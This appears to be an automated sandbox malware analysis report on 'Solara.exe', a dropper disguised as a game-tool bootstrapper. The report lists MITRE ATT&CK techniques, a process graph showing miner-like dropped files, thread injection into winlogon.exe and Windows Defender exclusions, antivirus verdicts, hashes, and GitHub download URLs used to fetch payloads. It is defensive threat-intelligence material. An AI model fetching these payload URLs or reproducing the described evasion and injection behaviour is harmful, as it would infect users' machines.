Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Windows Management Instrumentation		1
DLL Side-Loading		1
DLL Side-Loading		11
Disable or Modify Tools		1
Credential API Hooking		1
System Time Discovery		Remote Services1
Archive Collected Data		3
Ingress Tool Transfer		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts11
Native API		1
Windows Service		1
Access Token Manipulation		1
Deobfuscate/Decode Files or Information		LSASS Memory2
File and Directory Discovery		Remote Desktop Protocol1
Credential API Hooking		11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts12
Command and Scripting Interpreter		Logon Script (Windows)1
Windows Service		1
Obfuscated Files or Information		Security Account Manager43
System Information Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts1
Service Execution		Login Hook512
Process Injection		1
Timestomp		NTDS23
Security Software Discovery		Distributed Component Object ModelInput Capture4
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud Accounts1
PowerShell		Network Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets1
Process Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
Rootkit		Cached Domain Credentials41
Virtualization/Sandbox Evasion		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Masquerading		DCSync1
Application Window Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
Virtualization/Sandbox Evasion		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Access Token Manipulation		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron512
Process Injection		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
Hidden Files and Directories		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1585410 Sample: Solara.exe Startdate: 07/01/2025 Architecture: WINDOWS Score: 100 115 raw.githubusercontent.com 2->115 117 github.com 2->117 119 2 other IPs or domains 2->119 145 Antivirus detection for dropped file 2->145 147 Antivirus / Scanner detection for submitted sample 2->147 149 Multi AV Scanner detection for dropped file 2->149 151 12 other signatures 2->151 11 Solara.exe 4 2->11         started        15 lrgkmixyjzta.exe 2->15         started        signatures3 process4 file5 105 C:\Users\user\AppData\Local\Temp\xmr.exe, PE32+ 11->105 dropped 107 C:\Users\user\AppData\Local\Temp\eth.exe, PE32+ 11->107 dropped 109 C:\Users\user\...\Solara Bootstrapper.exe, PE32 11->109 dropped 155 Encrypted powershell cmdline option found 11->155 17 Solara Bootstrapper.exe 3 11->17         started        21 xmr.exe 2 11->21         started        23 eth.exe 1 11->23         started        25 powershell.exe 23 11->25         started        157 Multi AV Scanner detection for dropped file 15->157 signatures6 process7 file8 99 C:\Users\user\AppData\Local\Temp\kx new.exe, PE32 17->99 dropped 101 C:\Users\user\...\SolaraBootstrapper.exe, PE32 17->101 dropped 135 Encrypted powershell cmdline option found 17->135 27 kx new.exe 17->27         started        31 SolaraBootstrapper.exe 17->31         started        34 powershell.exe 23 17->34         started        103 C:\ProgramData\...\lrgkmixyjzta.exe, PE32+ 21->103 dropped 137 Multi AV Scanner detection for dropped file 21->137 139 Modifies the context of a thread in another process (thread injection) 21->139 141 Adds a directory exclusion to Windows Defender 21->141 36 dialer.exe 21->36         started        38 powershell.exe 21->38         started        44 10 other processes 21->44 40 powershell.exe 23 23->40         started        46 11 other processes 23->46 143 Loading BitLocker PowerShell Module 25->143 42 conhost.exe 25->42         started        signatures9 process10 dnsIp11 111 C:\Users\user\AppData\Local\...\xmr new.exe, PE32+ 27->111 dropped 113 C:\Users\user\AppData\...\Kawpow new.exe, PE32+ 27->113 dropped 159 Encrypted powershell cmdline option found 27->159 48 xmr new.exe 27->48         started        62 2 other processes 27->62 121 github.com 140.82.121.4, 443, 49704, 49706 GITHUBUS United States 31->121 123 raw.githubusercontent.com 185.199.108.133, 443, 49705 FASTLYUS Netherlands 31->123 161 Multi AV Scanner detection for dropped file 31->161 52 conhost.exe 31->52         started        54 conhost.exe 34->54         started        163 Contains functionality to inject code into remote processes 36->163 165 Writes to foreign memory regions 36->165 167 Allocates memory in foreign processes 36->167 171 2 other signatures 36->171 56 winlogon.exe 36->56 injected 58 conhost.exe 38->58         started        169 Loading BitLocker PowerShell Module 40->169 60 conhost.exe 40->60         started        64 11 other processes 44->64 66 11 other processes 46->66 file12 signatures13 process14 file15 97 C:\ProgramData\...\eejhedztifcv.exe, PE32+ 48->97 dropped 125 Writes to foreign memory regions 48->125 127 Modifies the context of a thread in another process (thread injection) 48->127 129 Adds a directory exclusion to Windows Defender 48->129 131 Injects a PE file into a foreign processes 48->131 68 powershell.exe 48->68         started        71 cmd.exe 48->71         started        73 sc.exe 48->73         started        79 3 other processes 48->79 133 Loading BitLocker PowerShell Module 62->133 75 powershell.exe 62->75         started        77 conhost.exe 62->77         started        signatures16 process17 signatures18 81 conhost.exe 68->81         started        83 conhost.exe 71->83         started        85 wusa.exe 71->85         started        87 conhost.exe 73->87         started        153 Loading BitLocker PowerShell Module 75->153 89 conhost.exe 75->89         started        91 conhost.exe 79->91         started        93 conhost.exe 79->93         started        95 conhost.exe 79->95         started        process19

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Solara.exe68%ReversingLabsWin32.Dropper.Dapato
Solara.exe100%AviraTR/Dropper.Gen
Solara.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe100%AviraTR/Dropper.Gen
C:\Users\user\AppData\Local\Temp\kx new.exe100%AviraTR/Dropper.Gen
C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\kx new.exe100%Joe Sandbox ML
C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe68%ReversingLabsWin64.Infostealer.Tinba
C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe74%ReversingLabsWin64.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\Kawpow new.exe74%ReversingLabsWin64.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe68%ReversingLabsWin32.Dropper.Dapato
C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe33%ReversingLabsWin32.PUA.Packunwan
C:\Users\user\AppData\Local\Temp\eth.exe68%ReversingLabsWin64.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\kx new.exe71%ReversingLabsWin32.Dropper.Dapato
C:\Users\user\AppData\Local\Temp\xmr new.exe74%ReversingLabsWin64.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\xmr.exe76%ReversingLabsWin64.Infostealer.Tinba

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
github.com
140.82.121.4
truefalse
    		high
    raw.githubusercontent.com
    		185.199.108.133
    		truefalse
      		high
      default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
      		217.20.57.35
      		truefalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://github.com/quivings/Solara/raw/main/Files/Solara.Dir.zipfalse
          		high
          https://raw.githubusercontent.com/quivings/Solara/main/Storage/version.txtfalse
            		high

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            185.199.108.133
            		raw.githubusercontent.comNetherlands
            		54113FASTLYUSfalse
            140.82.121.4
            		github.comUnited States
            		36459GITHUBUSfalse

            General Information

            Joe Sandbox version:41.0.0 Charoite
            Analysis ID:1585410
            Start date and time:2025-01-07 16:04:20 +01:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 11m 10s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:83
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:1
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:Solara.exe
            Detection:MAL
            Classification:mal100.evad.winEXE@146/40@2/2
            EGA Information:
            • Successful, ratio: 73.3%
            HCA Information:
            • Successful, ratio: 95%
            • Number of executed functions: 249
            • Number of non-executed functions: 210
            Cookbook Comments:
            • Found application associated with file extension: .exe

            Warnings

            • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, SIHClient.exe, WmiPrvSE.exe
            • Excluded IPs from analysis (whitelisted): 20.109.210.53, 52.165.164.15, 13.85.23.206, 2.22.50.131, 2.22.50.144, 13.107.246.45, 23.1.237.91
            • Excluded domains from analysis (whitelisted): www.bing.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
            • Execution Graph export aborted for target SolaraBootstrapper.exe, PID 1292 because it is empty
            • Execution Graph export aborted for target eth.exe, PID 6392 because it is empty
            • Execution Graph export aborted for target lrgkmixyjzta.exe, PID 7828 because it is empty
            • Execution Graph export aborted for target xmr.exe, PID 6024 because it is empty
            • Not all processes where analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtCreateKey calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Report size getting too big, too many NtReadVirtualMemory calls found.
            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            • VT rate limit hit for: Solara.exe

            Simulations

            Behavior and APIs

            TimeTypeDescription
            10:05:09API Interceptor1x Sleep call for process: xmr.exe modified
            10:05:09API Interceptor1x Sleep call for process: eth.exe modified
            10:05:09API Interceptor216x Sleep call for process: powershell.exe modified
            10:05:17API Interceptor1x Sleep call for process: Kawpow new.exe modified
            10:05:17API Interceptor13x Sleep call for process: SolaraBootstrapper.exe modified
            10:05:18API Interceptor1x Sleep call for process: xmr new.exe modified
            10:05:59API Interceptor400472x Sleep call for process: winlogon.exe modified

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            185.199.108.133cr_asm.ps1Get hashmaliciousUnknownBrowse
            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
            vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
            VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
            OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
            gaber.ps1Get hashmaliciousUnknownBrowse
            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
            cr_asm.ps1Get hashmaliciousUnknownBrowse
            • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
            140.82.121.4RfORrHIRNe.docGet hashmaliciousUnknownBrowse
            • github.com/ssbb36/stv/raw/main/5.mp3

            Domains

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            github.comhttps://github.com/eclipse-ecal/ecal/releases/download/v5.13.3/ecal_5.13.3-win64.exeGet hashmaliciousUnknownBrowse
            • 140.82.121.3
            PO#6100008 Jan04.02.2024.Xls.jsGet hashmaliciousWSHRat, STRRATBrowse
            • 140.82.121.4
            ebjtOH70jl.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
            • 140.82.121.3
            Gz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
            • 140.82.121.4
            ipmsg5.6.18_installer.exeGet hashmaliciousUnknownBrowse
            • 140.82.121.3
            eXbhgU9.exeGet hashmaliciousLummaCBrowse
            • 140.82.121.4
            fxsound_setup.exeGet hashmaliciousUnknownBrowse
            • 20.233.83.145
            Electrum-bch-4.4.2-x86_64.AppImage.elfGet hashmaliciousUnknownBrowse
            • 185.199.111.133
            OiMp3TH.exeGet hashmaliciousLummaCBrowse
            • 20.233.83.145
            YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
            • 20.233.83.145
            default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comSales Acknowledgement - HES #982323.pdfGet hashmaliciousUnknownBrowse
            • 84.201.210.39
            file_83f986ef2d0592ef993924a8cc5b8d6a_2025-01-07_10_04_01_718000.zipGet hashmaliciousUnknownBrowse
            • 217.20.57.36
            Setup.exeGet hashmaliciousLummaCBrowse
            • 217.20.57.18
            Insomia.exeGet hashmaliciousLummaCBrowse
            • 84.201.210.35
            T1#U5b89#U88c5#U53052.0.6.msiGet hashmaliciousUnknownBrowse
            • 84.201.210.34
            dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
            • 84.201.210.22
            Dd5DwDCHJD.exeGet hashmaliciousQuasarBrowse
            • 217.20.57.35
            46VHQmFDxC.exeGet hashmaliciousRedLineBrowse
            • 217.20.57.43
            Payment-Order #24560274 for 8,380 USD.exeGet hashmaliciousAsyncRAT, PureLog Stealer, zgRATBrowse
            • 217.20.57.35
            PersonnelPolicies.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
            • 217.20.57.37
            raw.githubusercontent.com3lhrJ4X.exeGet hashmaliciousLiteHTTP BotBrowse
            • 185.199.111.133
            dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
            • 185.199.109.133
            dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
            • 185.199.110.133
            Gz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
            • 185.199.109.133
            ipmsg5.6.18_installer.exeGet hashmaliciousUnknownBrowse
            • 185.199.111.133
            over.ps1Get hashmaliciousVidarBrowse
            • 185.199.109.133
            Epsilon.exeGet hashmaliciousUnknownBrowse
            • 185.199.111.133
            eXbhgU9.exeGet hashmaliciousLummaCBrowse
            • 185.199.110.133
            Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
            • 185.199.108.133
            Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
            • 185.199.108.133

            ASNs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            GITHUBUShttps://github.com/eclipse-ecal/ecal/releases/download/v5.13.3/ecal_5.13.3-win64.exeGet hashmaliciousUnknownBrowse
            • 140.82.121.3
            PO#6100008 Jan04.02.2024.Xls.jsGet hashmaliciousWSHRat, STRRATBrowse
            • 140.82.121.4
            ebjtOH70jl.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
            • 140.82.121.3
            Gz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
            • 140.82.121.4
            ipmsg5.6.18_installer.exeGet hashmaliciousUnknownBrowse
            • 140.82.121.3
            EdYEXasNiR.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
            • 140.82.121.3
            5EfYBe3nch.exeGet hashmaliciousLummaC, Amadey, Babadeda, LiteHTTP Bot, LummaC Stealer, Poverty Stealer, StealcBrowse
            • 140.82.121.3
            eXbhgU9.exeGet hashmaliciousLummaCBrowse
            • 140.82.121.4
            rQuotation.exeGet hashmaliciousFormBookBrowse
            • 192.30.252.154
            https://pdf.ac/3eQ2mdGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
            • 140.82.112.3
            FASTLYUSAirbornemx_PAYOUT7370.odtGet hashmaliciousUnknownBrowse
            • 151.101.2.137
            https://coggle.it/diagram/Z3zkZPAQxQkDOgmo/t/-/1f6434bfba7d8aab898b2531849681e8b0d7342489acbbff6b172f8658a09526Get hashmaliciousUnknownBrowse
            • 151.101.128.176
            https://email.garagesalefinder.com/c/eJyMU92OsjoUfZp6xwRaoO2FF-XPYT4VnXHQ8caUFivK3wcC-vYnzImc25OQlbXYa-_VJrtyniCCZ-ncwMg2KKWmPrvMCRWYGDSBBAkLnSGigttEUJpiLHRhzLK5JRHWEbE0wS1LkxzqmpnKRCMYcymIhUyJgKkr3nCVtjxPz1kp0-ZNVMUsn1_u9xogBmAAYDAMw5uqKpWnXLZp02cibUcfgEHNVcolgAEX-Q2goOUAeUsAbZ4B5Lma-bXS9YjEH8_jUsCMDFHdh-8V6xawX6ug4FFt3FtnCCFin8wJow2-DWulyU1_iVhfsfe8SpYtI8px_iiPHZXv8Movh2Cj-95Hcj0kV7urV6jyYvatjOfWaYZ2MRxIba6V3Jx55O3PcZmp2muai3lerzYyDgu0zWKnNlb-o7Sf7h6p70NxCvM23_41HfOEGuWGy9q9Hnlqfep7pO0Kfgrvm-rvV7zTOloie11_fJdEol2uDrr9xfmOPrr1Vr-IJWM_mXjnt9SPV5IVx53pOD-UrUI1qHwX-N2-JfHP9ThUm97B9z_nIOnjcuOGjloo51Iwxy6FckMA7bIrAPIMAG2RSYA8a5H18gTbKy737aLto4f-0GD3DaDdZgogj0WebZ6M8IN8ys_TY2eziPTBe70KjWKtt8gaxll5lpZ3gDzBtbpLNBsalBgGNrFuUoTHOC67JgfIGzehnVYBQAtjAC37l8GRuSOYU4G-pG2NgEYgk_ReFjwWsPli0J_MwSSdVxuc_v2bYU25I0BvMvvT0fBL_tdrsyktMAglv0Qs4o5D0vHD8ZIUFG4XwVMUFP0UQcef1jWBOkDea447drMR_PHuZATmTlIH0KIMQPP3-3_uWTOv0_JWvWU9L6semDpvmmpIeHn7fYv9HP4TAAD__7e2IkMGet hashmaliciousHTMLPhisherBrowse
            • 151.101.2.137
            Onedrive Shared document.htmlGet hashmaliciousHTMLPhisherBrowse
            • 151.101.2.137
            Quarantined Messages(3).zipGet hashmaliciousHTMLPhisherBrowse
            • 151.101.194.137
            Sales Acknowledgement - HES #982323.pdfGet hashmaliciousUnknownBrowse
            • 151.101.129.140
            https://docs.google.com/presentation/d/e/2PACX-1vT2PGn0zBbaptqxmzd37o4wD_789vdOk0IyvB9NJB93qGFh_af8Du5RuZX0G1lsycIP1UzhONEj31sn/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
            • 151.101.194.137
            file_83f986ef2d0592ef993924a8cc5b8d6a_2025-01-07_10_04_01_718000.zipGet hashmaliciousUnknownBrowse
            • 199.232.214.172
            Mansourbank Swift-TT379733 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
            • 151.101.193.229
            https://e.trustifi.com/#/fff2a0/615048/6b9108/bb6bb8/0c4d40/10c266/f490c9/97ed1b/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/85de28/9434d8/86c8f5/bcad02/214fc7/998ea3/f74550/f15e41/328dbb/f2d014/49d879/3689f7/91b4f6/9617cd/897401/851960/993266/280340/ae6054/337b49/6f0428/673840/abdb07/82b8be/00f4e1/3270c4/922952/b4db4e/e9dcee/3a01c5/962a76/930521/2e7fc6/514759/a95ca8/c37226/be9e63/3c4ec2/89148e/13fdfe/ea86c0/04048b/56ab74/dca15f/97696c/fa7912/512e28/fc9f59/50d13f/4f0114/039a8f/84bd72/2603b6/e0eceb/28f211/4fdb34/a1dc16/2076ef/8e55cf/8f9d2c/0d4402/f5a713/43ec64/fabda1/b6994c/da2da1/2851a8/b04ed3/8cea9a/1e21dc/0abaf5/7df73e/f39a96/1f2244/423c00/5c4e8dGet hashmaliciousHTMLPhisherBrowse
            • 151.101.66.137

            JA3 Fingerprints

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            3b5074b1b5d032e5620f69f9f700ff0evRecording__0023secs__Stgusa.htmlGet hashmaliciousUnknownBrowse
            • 185.199.108.133
            • 140.82.121.4
            ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
            • 185.199.108.133
            • 140.82.121.4
            U1P3u1tkB2.exeGet hashmaliciousUnknownBrowse
            • 185.199.108.133
            • 140.82.121.4
            U1P3u1tkB2.exeGet hashmaliciousUnknownBrowse
            • 185.199.108.133
            • 140.82.121.4
            9876567899.bat.exeGet hashmaliciousLokibotBrowse
            • 185.199.108.133
            • 140.82.121.4
            https://antiphishing.vadesecure.com/v4?f=bnJjU3hQT3pQSmNQZVE3aOMl-Yxz6sxP-_mvIRuY-wdnZ1bXTFIOIwMxyCDi0KedKx4XzS44_P2zUeNIsKUb0ScW6k1yl1_sQ4IsBBcClSw_vWV34HFG0fKKBNYTYHpo&i=SGI0YVJGNmxZNE90Z2thMHUqf298Dc88cJEXrW3w1lA&k=dFBm&r=SW5LV3JodE9QZkRVZ3JEYa6kbR5XAzhHFJ0zbTQRADrRG7ugnfE15pwrEQUVhgv3E2tVXwBw8NfFSkf3wOZ0VA&s=ecaab139c1f3315ccc0d88a6451dccec431e8ce1d856e71e5109e33657c13a3c&u=https%3A%2F%2Fsender5.zohoinsights-crm.com%2Fck1%2F2d6f.327230a%2F5f929700-cca4-11ef-973d-525400f92481%2F4cb2ae4047e7a38310b2b2641663917c123a5dec%2F2%3Fe%3DGKxHQ%252FSSm8D%252B%252B3g8VEcICaLHKdekhRU94ImygZ37tRI%253DGet hashmaliciousUnknownBrowse
            • 185.199.108.133
            • 140.82.121.4
            Mes_Drivers_3.0.4.exeGet hashmaliciousUnknownBrowse
            • 185.199.108.133
            • 140.82.121.4
            c2.htaGet hashmaliciousRemcosBrowse
            • 185.199.108.133
            • 140.82.121.4
            setup-avast-premium-x64.exeGet hashmaliciousUnknownBrowse
            • 185.199.108.133
            • 140.82.121.4
            setup-avast-premium-x64.exeGet hashmaliciousUnknownBrowse
            • 185.199.108.133
            • 140.82.121.4

            Dropped Files

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeNeverlose.exeGet hashmaliciousXWormBrowse
              Vjy8d2EoqK.exeGet hashmaliciousBlank Grabber, DCRat, XWormBrowse
                RdJ73GU3N1.exeGet hashmaliciousNjratBrowse
                  SolaraBootstrapper.exeGet hashmaliciousDCRat, XWormBrowse
                    QIjBj1l8We.exeGet hashmaliciousBlank GrabberBrowse
                      6tGWMkdYv4.exeGet hashmaliciousBlank GrabberBrowse

                        Created / dropped Files

                        C:\ProgramData\ctnanvlfqbax\lrgkmixyjzta.exe

                        Download File
                        Process:C:\Users\user\AppData\Local\Temp\xmr.exe
                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):5468672
                        Entropy (8bit):6.523912582824609
                        Encrypted:false
                        SSDEEP:98304:CKloGqNsn3EQMZrDn2aOzO5wzv80/rvVioLICFIJV6MGG/ZclhOP9fjSmlNi/LbP:Rloly39MBD2BiwPDV/IkIJV6AZcL49fy
                        MD5:87C3DD67BFA3009D89F7B45B01D705B8
                        SHA1:7EB74405565DD5971298B2A2C8DE9116D08DB2D5
                        SHA-256:92722D28951672263B79CD30EB975D770CFD5BD5FF53344FD329546FB950F155
                        SHA-512:C79F10712BB505D3645C9FDF8EF11BD787AB327FC2F176302DE71B5D4A886026E46E40338A5DB964E4B42BD152F3279FDA8F2F842F99876BEE1B0783D2F74E0E
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 68%
                        Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d....;.f.........."...........R.....@..........@..............................S...........`.....................................................<.............S...............S.x...............................(.......8...........x...`............................text...F........................... ..`.rdata..l$.......&..................@..@.data.....R.......R.................@....pdata........S......jS.............@..@.00cfg........S......lS.............@..@.tls..........S......nS.............@....reloc..x.....S......pS.............@..B................................................................................................................................................................................................................................................................................................................................................

                        C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe

                        Download File
                        Process:C:\Users\user\AppData\Local\Temp\xmr new.exe
                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):5471744
                        Entropy (8bit):6.525931537093555
                        Encrypted:false
                        SSDEEP:98304:gBybWc2fgjrlVrH3Y27fd2BY1z7QDkR3m1W:hic2GrrrH3Y2Bd1fIkR3m
                        MD5:FB6A3B436E9F9402937D95F755B62F91
                        SHA1:AEA3A8A311C2B8B6FC7D9D263B952F95A30B180E
                        SHA-256:4C9D878E35E7FD497C633A770D3359FB37447985450DC19F45DB0925972C39E0
                        SHA-512:7A3E2E42FE965DB1CEBC539235FEC88E277669C9A62BE2450EA4EFAF5DD93F1DE11740197FF26E697E9E9ACC499CBA2C30B64CFA5E5B35B28B9E0B93087EE2F8
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 74%
                        Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d......f.........."...........R.....@..........@..............................T...........`.................................................H...<.............S...............S.................................(.......8...............`............................text.............................. ..`.rdata...'.......(..................@..@.data.....R.......R.................@....pdata........S......vS.............@..@.00cfg........S......xS.............@..@.tls..........S......zS.............@....reloc........S......|S.............@..B................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SolaraBootstrapper.exe.log

                        Download File
                        Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:modified
                        Size (bytes):954
                        Entropy (8bit):5.350970057955659
                        Encrypted:false
                        SSDEEP:24:ML9E4KLE4KnKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKLHKnYHKh3oPtHo6hAHKzeR
                        MD5:3CE64235B0821B76294C3AD95F117E6C
                        SHA1:FD1EC471493CE132D0D719A9771739912BEF91BF
                        SHA-256:C5348C9009777CDF6C5CBD5D767A400932C0E1FA95F49DF8E797685754790850
                        SHA-512:DA80BE8655187998EB5425EC801E352C386891991A4575811DE365DFD38B1325DE95A540953EC6E9305E74B1A0560968729D742A01198540CFCC166635F104C5
                        Malicious:false
                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.IO.Compression.FileSystem, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

